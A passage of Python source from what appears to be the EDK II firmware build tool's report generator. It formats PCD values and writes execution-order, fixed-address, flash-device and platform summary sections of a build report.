FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
else:
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
Value = SkuInfo.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
else:
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
if TypeName in ('DYNVPD', 'DEXVPD'):
FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
VPDPcdItem = (Pcd.TokenSpaceGuidCName + '.' + PcdTokenCName, SkuIdName, SkuInfo.VpdOffset, Pcd.MaxDatumSize, SkuInfo.DefaultValue)
if VPDPcdItem not in VPDPcdList:
VPDPcdList.append(VPDPcdItem)
if IsStructure:
FiledOverrideFlag = False
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = list(OverrideValues.keys())
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
OverrideFieldStruct = collections.OrderedDict()
if OverrideStruct:
for _, Values in OverrideStruct.items():
for Key,value in Values.items():
if value[1] and value[1].endswith('.dsc'):
OverrideFieldStruct[Key] = value
if Pcd.PcdFieldValueFromFdf:
for Key, Values in Pcd.PcdFieldValueFromFdf.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromComm:
for Key, Values in Pcd.PcdFieldValueFromComm.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
return OverrideFieldStruct
def PrintStructureInfo(self, File, Struct):
for Key, Value in sorted(Struct.items(), key=lambda x: x[0]):
if Value[1] and 'build command options' in Value[1]:
FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
elif Value[1] and Value[1].endswith('.fdf'):
FileWrite(File, ' *F %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
else:
FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
def StrtoHex(self, value):
try:
value = hex(int(value))
return value
except:
if value.startswith("L\"") and value.endswith("\""):
valuelist = []
for ch in value[2:-1]:
valuelist.append(hex(ord(ch)))
valuelist.append('0x00')
return valuelist
elif value.startswith("\"") and value.endswith("\""):
return hex(ord(value[1:-1]))
elif value.startswith("{") and value.endswith("}"):
valuelist = []
if ',' not in value:
return value[1:-1]
for ch in value[1:-1].split(','):
ch = ch.strip()
if ch.startswith('0x') or ch.startswith('0X'):
valuelist.append(ch)
continue
try:
valuelist.append(hex(int(ch.strip())))
except:
pass
return valuelist
else:
return value
def IsStructurePcd(self, PcdToken, PcdTokenSpaceGuid):
if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd) and ((PcdToken, PcdTokenSpaceGuid) in GlobalData.gStructurePcd[self.Arch]):
return True
else:
return False
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
##
# Constructor function for class PredictionReport
#
# This constructor function generates PredictionReport object for the platform.
#
# @param self: The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
self._MapFileParsed = False
self._EotToolInvoked = False
self._FvDir = Wa.FvDir
self._EotDir = Wa.BuildDir
self._FfsEntryPoint = {}
self._GuidMap = {}
self._SourceList = []
self.FixedMapDict = {}
self.ItemList = []
self.MaxLen = 0
#
# Collect all platform reference source files and GUID C Name
#
for Pa in Wa.AutoGenObjectList:
for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
#
# BASE typed modules are EFI agnostic, so we need not scan
# their source code to find PPI/Protocol produce or consume
# information.
#
if Module.ModuleType == SUP_MODULE_BASE:
continue
#
# Add module referenced source files
#
self._SourceList.append(str(Module))
IncludeList = {}
for Source in Module.SourceFileList:
if os.path.splitext(str(Source))[1].lower() == ".c":
self._SourceList.append(" " + str(Source))
FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
for IncludeFile in IncludeList.values():
self._SourceList.append(" " + IncludeFile)
for Guid in Module.PpiList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
for Guid in Module.ProtocolList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
for Guid in Module.GuidList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])
if Module.Guid and not Module.IsLibrary:
EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
RealEntryPoint = "_ModuleEntryPoint"
self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)
#
# Collect platform firmware volume list as the input of EOT.
#
self._FvList = []
if Wa.FdfProfile:
for Fd in Wa.FdfProfile.FdDict:
for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
continue
for FvName in FdRegion.RegionDataList:
if FvName in self._FvList:
continue
self._FvList.append(FvName)
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self._FvList:
continue
self._FvList.append(FvSection.FvName)
except AttributeError:
pass
##
# Parse platform fixed address map files
#
# This function parses the platform final fixed address map file to get
# the database of predicted fixed address for module image base, entry point
# etc.
#
# @param self: The object pointer
#
def _ParseMapFile(self):
if self._MapFileParsed:
return
self._MapFileParsed = True
if os.path.isfile(self._MapFileName):
try:
FileContents = open(self._MapFileName).read()
for Match in gMapFileItemPattern.finditer(FileContents):
AddressType = Match.group(1)
BaseAddress = Match.group(2)
EntryPoint = Match.group(3)
Guid = Match.group(4).upper()
List = self.FixedMapDict.setdefault(Guid, [])
List.append((AddressType, BaseAddress, "*I"))
List.append((AddressType, EntryPoint, "*E"))
except:
EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
##
# Invokes EOT tool to get the predicted the execution order.
#
# This function invokes EOT tool to calculate the predicted dispatch order
#
# @param self: The object pointer
#
def _InvokeEotTool(self):
if self._EotToolInvoked:
return
self._EotToolInvoked = True
FvFileList = []
for FvName in self._FvList:
FvFile = os.path.join(self._FvDir, FvName + ".Fv")
if os.path.isfile(FvFile):
FvFileList.append(FvFile)
if len(FvFileList) == 0:
return
#
# Write source file list and GUID file list to an intermediate file
# as the input for EOT tool and dispatch List as the output file
# from EOT tool.
#
SourceList = os.path.join(self._EotDir, "SourceFile.txt")
GuidList = os.path.join(self._EotDir, "GuidList.txt")
DispatchList = os.path.join(self._EotDir, "Dispatch.txt")
TempFile = []
for Item in self._SourceList:
FileWrite(TempFile, Item)
SaveFileOnChange(SourceList, "".join(TempFile), False)
TempFile = []
for Key in self._GuidMap:
FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
SaveFileOnChange(GuidList, "".join(TempFile), False)
try:
from Eot.EotMain import Eot
#
# Invoke EOT tool and echo its runtime performance
#
EotStartTime = time.time()
Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
EotEndTime = time.time()
EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
EdkLogger.quiet("EOT run time: %s\n" % EotDuration)
#
# Parse the output of EOT tool
#
for Line in open(DispatchList):
if len(Line.split()) < 4:
continue
(Guid, Phase, FfsName, FilePath) = Line.split()
Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
if len(Symbol) > self.MaxLen:
self.MaxLen = len(Symbol)
self.ItemList.append((Phase, Symbol, FilePath))
except:
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.")
##
# Generate platform execution order report
#
# This function generates the predicted module execution order.
#
# @param self The object pointer
# @param File The file object for report
#
def _GenerateExecutionOrderReport(self, File):
self._InvokeEotTool()
if len(self.ItemList) == 0:
return
FileWrite(File, gSectionStart)
FileWrite(File, "Execution Order Prediction")
FileWrite(File, "*P PEI phase")
FileWrite(File, "*D DXE phase")
FileWrite(File, "*E Module INF entry point name")
FileWrite(File, "*N Module notification function name")
FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
FileWrite(File, gSectionSep)
for Item in self.ItemList:
FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
FileWrite(File, gSectionStart)
##
# Generate Fixed Address report.
#
# This function generate the predicted fixed address report for a module
# specified by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
# @param NotifyList The list of all notify function in a module
#
def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
self._ParseMapFile()
FixedAddressList = self.FixedMapDict.get(Guid)
if not FixedAddressList:
return
FileWrite(File, gSubSectionStart)
FileWrite(File, "Fixed Address Prediction")
FileWrite(File, "*I Image Loading Address")
FileWrite(File, "*E Entry Point Address")
FileWrite(File, "*N Notification Function Address")
FileWrite(File, "*F Flash Address")
FileWrite(File, "*M Memory Address")
FileWrite(File, "*S SMM RAM Offset")
FileWrite(File, "TOM Top of Memory")
FileWrite(File, "Type Address Name")
FileWrite(File, gSubSectionSep)
for Item in FixedAddressList:
Type = Item[0]
Value = Item[1]
Symbol = Item[2]
if Symbol == "*I":
Name = "(Image Base)"
elif Symbol == "*E":
Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
elif Symbol in NotifyList:
Name = Symbol
Symbol = "*N"
else:
continue
if "Flash" in Type:
Symbol += "F"
elif "Memory" in Type:
Symbol += "M"
else:
Symbol += "S"
if Value[0] == "-":
Value = "TOM" + Value
FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
##
# Generate report for the prediction part
#
# This function generate the predicted fixed address report for a module or
# predicted module execution order for a platform.
# If the input Guid is None, then, it generates the predicted module execution order;
# otherwise it generated the module fixed loading address for the module specified by
# Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
#
def GenerateReport(self, File, Guid):
if Guid:
self._GenerateFixedAddressReport(File, Guid.upper(), [])
else:
self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nesting FVs, the nested FVs will list immediate after
# this FD region subsection
#
class FdRegionReport(object):
##
# Discover all the nested FV name list.
#
# This is an internal worker function to discover the all the nested FV information
# in the parent firmware volume. It uses deep first search algorithm recursively to
# find all the FV list name and append them to the list.
#
# @param self The object pointer
# @param FvName The name of current firmware file system
# @param Wa Workspace context information
#
def _DiscoverNestedFvList(self, FvName, Wa):
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self.FvList:
continue
self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
self.FvList.append(FvSection.FvName)
self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
self._DiscoverNestedFvList(FvSection.FvName, Wa)
except AttributeError:
pass
##
# Constructor function for class FdRegionReport
#
# This constructor function generates FdRegionReport object for a specified FdRegion.
# If the FdRegion is a firmware volume, it will recursively find all its nested Firmware
# volume list. This function also collects GUID map in order to dump module identification
# in the final report.
#
# @param self: The object pointer
# @param FdRegion The current FdRegion object
# @param Wa Workspace context information
#
def __init__(self, FdRegion, Wa):
self.Type = FdRegion.RegionType
self.BaseAddress = FdRegion.Offset
self.Size = FdRegion.Size
self.FvList = []
self.FvInfo = {}
self._GuidsDb = {}
self._FvDir = Wa.FvDir
self._WorkspaceDir = Wa.WorkspaceDir
#
# If the input FdRegion is not a firmware volume,
# we are done.
#
if self.Type != BINARY_FILE_TYPE_FV:
return
#
# Find all nested FVs in the FdRegion
#
for FvName in FdRegion.RegionDataList:
if FvName in self.FvList:
continue
self.FvList.append(FvName)
self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
self._DiscoverNestedFvList(FvName, Wa)
PlatformPcds = {}
#
# Collect PCDs declared in DEC files.
#
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
#
# Collect PCDs defined in DSC file
#
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
#
# Add PEI and DXE a priori files GUIDs defined in PI specification.
#
self._GuidsDb[PEI_APRIORI_GUID] = "PEI Apriori"
self._GuidsDb[DXE_APRIORI_GUID] = "DXE Apriori"
#
# Add ACPI table storage file
#
self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"
for Pa in Wa.AutoGenObjectList:
for ModuleKey in Pa.Platform.Modules:
M = Pa.Platform.Modules[ModuleKey].M
InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)
#
# Collect the GUID map in the FV firmware volume
#
for FvName in self.FvList:
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
try:
#
# collect GUID map for binary EFI file in FDF file.
#
Guid = Ffs.NameGuid.upper()
Match = gPcdGuidPattern.match(Ffs.NameGuid)
if Match:
PcdTokenspace = Match.group(1)
PcdToken = Match.group(2)
if (PcdToken, PcdTokenspace) in PlatformPcds:
GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
for Section in Ffs.SectionList:
try:
ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
self._GuidsDb[Guid] = ModuleSectFile
except AttributeError:
pass
except AttributeError:
pass
##
# Internal worker function to generate report for the FD region
#
# This internal worker function to generate report for the FD region.
# It the type is firmware volume, it lists offset and module identification.
#
# @param self The object pointer
# @param File The file object for report
# @param Title The title for the FD subsection
# @param BaseAddress The base address for the FD region
# @param Size The size of the FD region
# @param FvName The FV name if the FD region is a firmware volume
#
def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
FileWrite(File, gSubSectionStart)
FileWrite(File, Title)
FileWrite(File, "Type: %s" % Type)
FileWrite(File, "Base Address: 0x%X" % BaseAddress)
if self.Type == BINARY_FILE_TYPE_FV:
FvTotalSize = 0
FvTakenSize = 0
FvFreeSize = 0
if FvName.upper().endswith('.FV'):
FileExt = FvName + ".txt"
else:
FileExt = FvName + ".Fv.txt"
if not os.path.isfile(FileExt):
FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
if not os.path.isfile(FvReportFileName):
FvReportFileName = os.path.join(self._FvDir, FileExt)
try:
#
# Collect size info in the firmware volume.
#
FvReport = open(FvReportFileName).read()
Match = gFvTotalSizePattern.search(FvReport)
if Match:
FvTotalSize = int(Match.group(1), 16)
Match = gFvTakenSizePattern.search(FvReport)
if Match:
FvTakenSize = int(Match.group(1), 16)
FvFreeSize = FvTotalSize - FvTakenSize
#
# Write size information to the report file.
#
FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
FileWrite(File, "Offset Module")
FileWrite(File, gSubSectionSep)
#
# Write module offset and module identification to the report file.
#
OffsetInfo = {}
for Match in gOffsetGuidPattern.finditer(FvReport):
Guid = Match.group(2).upper()
OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
OffsetList = sorted(OffsetInfo.keys())
for Offset in OffsetList:
FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FvReportFileName)
else:
FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
FileWrite(File, gSubSectionEnd)
##
# Generate report for the FD region
#
# This function generates report for the FD region.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if (len(self.FvList) > 0):
for FvItem in self.FvList:
Info = self.FvInfo[FvItem]
self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
else:
self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
##
# Constructor function for class FdReport
#
# This constructor function generates FdReport object for a specified
# firmware device.
#
# @param self The object pointer
# @param Fd The current Firmware device object
# @param Wa Workspace context information
#
def __init__(self, Fd, Wa):
self.FdName = Fd.FdUiName
self.BaseAddress = Fd.BaseAddress
self.Size = Fd.Size
self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
self.VPDBaseAddress = 0
self.VPDSize = 0
for index, FdRegion in enumerate(Fd.RegionList):
if str(FdRegion.RegionType) is 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
self.VPDSize = self.FdRegionList[index].Size
break
##
# Generate report for the firmware device.
#
# This function generates report for the firmware device.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSectionStart)
FileWrite(File, "Firmware Device (FD)")
FileWrite(File, "FD Name: %s" % self.FdName)
FileWrite(File, "Base Address: %s" % self.BaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
if len(self.FdRegionList) > 0:
FileWrite(File, gSectionSep)
for FdRegionItem in self.FdRegionList:
FdRegionItem.GenerateReport(File)
if VPDPcdList:
VPDPcdList.sort(key=lambda x: int(x[2], 0))
FileWrite(File, gSubSectionStart)
FileWrite(File, "FD VPD Region")
FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
FileWrite(File, gSubSectionSep)
for item in VPDPcdList:
# Add BaseAddress for offset
Offset = '0x%08X' % (int(item[2], 16) + self.VPDBaseAddress)
IsByteArray, ArrayList = ByteArrayForamt(item[-1])
Skuinfo = item[1]
if len(GlobalData.gSkuids) == 1 :
Skuinfo = GlobalData.gSkuids[0]
if IsByteArray:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], item[-1]))
FileWrite(File, gSubSectionEnd)
FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
##
# Constructor function for class PlatformReport
#
# This constructor function generates PlatformReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def __init__(self, Wa, MaList, ReportType):
self._WorkspaceDir = Wa.WorkspaceDir
self.PlatformName = Wa.Name
self.PlatformDscPath = Wa.Platform
self.Architectures = " ".join(Wa.ArchList)
self.ToolChain = Wa.ToolChain
self.Target = Wa.BuildTarget
self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
self.BuildEnvironment = platform.platform()
self.PcdReport = None
if "PCD" in ReportType:
self.PcdReport = PcdReport(Wa)
self.FdReportList = []
if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
for Fd in Wa.FdfProfile.FdDict:
self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))
self.PredictionReport = None
if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
self.PredictionReport = PredictionReport(Wa)
self.DepexParser = None
if "DEPEX" in ReportType:
self.DepexParser = DepexParser(Wa)
self.ModuleReportList = []
if MaList is not None:
self._IsModuleBuild = True
for Ma in MaList:
self.ModuleReportList.append(ModuleReport(Ma, ReportType))
else:
self._IsModuleBuild = False
for Pa in Wa.AutoGenObjectList:
ModuleAutoGenList = []
for ModuleKey in Pa.Platform.Modules:
ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
if GlobalData.gFdfParser is not None:
if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
for InfName in INFList:
InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile)
if Ma is None:
continue
if Ma not in ModuleAutoGenList:
ModuleAutoGenList.append(Ma)
for MGen in ModuleAutoGenList:
self.ModuleReportList.append(ModuleReport(MGen, ReportType))
##
# Generate report for the whole platform.
#
# This function generates report for platform information.
# It comprises of platform summary, global PCD, flash and
# module list sections.
#
# @param self The object pointer
# @param File The file object for report
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen Phase
# @param MakeTime The total time of Make Phase
# @param GenFdsTime The total time of GenFds Phase
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
FileWrite(File, "Platform Summary")
FileWrite(File, "Platform Name: %s" % self.PlatformName)
FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
FileWrite(File, "Architectures: %s" % self.Architectures)
FileWrite(File, "Tool Chain: %s" % self.ToolChain)
FileWrite(File, "Target: %s" % self.Target)
if GlobalData.gSkuids:
FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
if GlobalData.gDefaultStores:
FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
FileWrite(File, "Output Path: %s" % self.OutputPath)
FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
FileWrite(File, "Build Duration: %s" % BuildDuration)
if AutoGenTime:
FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
if MakeTime:
FileWrite(File, "Make Duration: %s" % MakeTime)
if GenFdsTime:
FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
FileWrite(File, "Report Content: %s" % ", ".join(ReportType))
if GlobalData.MixedPcd:
FileWrite(File, gSectionStart)
FileWrite(File, "The following PCDs use different access methods:")
FileWrite(File, gSectionSep)
for PcdItem in GlobalData.MixedPcd:
FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
FileWrite(File, gSectionEnd)
if not self._IsModuleBuild:
if "PCD" in ReportType:
